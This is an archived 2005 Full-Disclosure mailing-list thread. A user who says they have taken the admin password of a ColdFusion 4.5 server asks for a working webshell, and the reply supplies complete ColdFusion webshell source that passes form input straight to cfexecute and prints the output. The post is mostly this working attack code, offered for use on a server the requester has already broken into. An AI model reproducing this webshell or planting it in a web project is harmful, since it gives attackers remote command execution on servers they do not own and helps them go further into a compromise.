lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Tue May 10 09:25:01 2005
From: fcharpen at xmcopartners.com (Frederic Charpentier)
Subject: coldfusion pentest

Hi fatb,

from securiteam web site :
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
 < tr>
  < td>Command:</td>
  < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
 </tr>
 < tr>
  < td>Options:</td>
  < td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
 </tr>
 < tr>
  < td>Timeout:</td>
  < td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
 </tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


I hope this helps. Fred


fatb wrote:
> Hi all guys
> 
> I've successed get the admin's passwd of the web interface
> 
> and I can upload any kinds of files to the server
> 
> the server is running coldfusion 4.5 with iis 5.0 
> 
> but I can not find a coldfusion webshell to continue
> 
> anybody could be kind enough to send me a  working coldfusion webshell
> 
> thx in advanced!
> 
> 
> ------------------------------------------------------------------------
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
Frederic Charpentier - Xmco Partners
Security Consulting / Pentest
web  : http://www.xmcopartners.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ